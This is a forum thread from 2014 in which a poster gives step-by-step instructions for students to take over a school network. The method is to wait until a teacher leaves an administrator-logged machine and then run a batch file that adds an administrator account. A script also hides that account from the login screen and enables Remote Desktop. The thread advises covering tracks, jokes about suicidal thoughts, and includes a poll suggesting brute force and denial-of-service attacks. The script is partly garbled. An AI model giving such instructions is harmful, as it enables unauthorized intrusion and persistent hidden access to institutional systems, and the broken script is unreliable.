How to CMD school network hacking

Discussion in 'Ethical hacking' started by Deleted member 114795, Apr 3, 2014.

?

Is there any other way to do this?

1. Only locally not on a network. So no, unless that was your initial intent

0 vote(s)
    0.0%
  2. YES, Brute force attack the schools systems, with maby a DOS 52 attack, Problem solved

1 vote(s)
    100.0%
  1. I looked at this thread (unable to display due to website rules) and I see that there is a problem here. so the problem is that you require some extended privileges in order to create an admin account. so now I will give you an alternative on how to do this.

Step 1. Make sure that you know the name and password and domain of the user you want to extend to admin.

Step 2. Make a bat file of the user name. so go to notepad and type "net localgroup administrator (username) /add" [ignore the quotations and brackets] then save the file as .bat on a removable media.

Step 3. open CMD if possible on a random computer connected to the domain/network and type "net user" if you see the username you want to change, then smile because life just got easy.

Step 4. Make sure that you have a lets say weak IT or CAT teacher(untrained) at school.

Step 5. Warning this step may require some criminal intuition! Now wait for the teacher to leave to the bathroom or get coffee or whatever, then get the bat file from earlier and go and execute it on his machine provided that he has logged on as administrator. Then after a minute or so if you did everything right every computer that is logged on with that user will restart, then you will see that the user is admin.(this should all happen between 30 - 90 sec)

Step 6. If step 4 isn't possible then once step 5 is done the quickly create and administrator account on every individual machine that you may most possibly use and then execute command : "net localgroup administrator (username) /delete"

Step 7. Make sure that you have returned everything to where they were as they were.

Step 8. Enjoy your new powers. Note that to much of unauthorized activity(large internet activity, restricted websites) can get you and or the machines under investigation

Step 9 Make a bat file of this, so open notepad then enter from the quotations but don't include the quotations. Only edit the (Brackets) leave everything else untouched!

Quick user creation : "@Echo Off

SET /P usr=[Enter new username here:]

SET /P pwd=[Enter new password here:]

:: SET /P takes the user input and puts it into the variable.

echo — Creating New User, (username) with password (password) –

net user (username) Within /add

echo — Adding User to Group Administrator –

net localgroup Administrators (username) /add

echo — User Is Now Administrator — >>

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v (username) /t REG_DWORD /d 0 /f

echo — Activating Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activating Terminal Service Done –

SET /P =Press Enter to continue . . .

Exit"
    Edit step 9 Enter Accordingly i.e username and password in brackets only ignore the rest
    The contents of all material available on this Internet site are copyrighted by me unless otherwise indicated. Copyright is not claimed as to any part of an original work prepared me or anyone as part of that person's official duties. All rights are reserved and content may not be reproduced, disseminated, published, or transferred in any form or by any means
    so you use this information at you own risk :D i.e Explelsion, Humiliation, suicide thoughts, etc...

shabbir likes this.
  2. Oh yes step 9 regardless of what you may put in, the whole process is dependent on what you put in the brackets on editing so if you put (josh) as username when you execute the file. you can type James but the user will still remain josh until you edit and change the bat file

3. KAJAL1234

KAJAL1234 New Member

I want to know about hacking. I love to grow up in this field.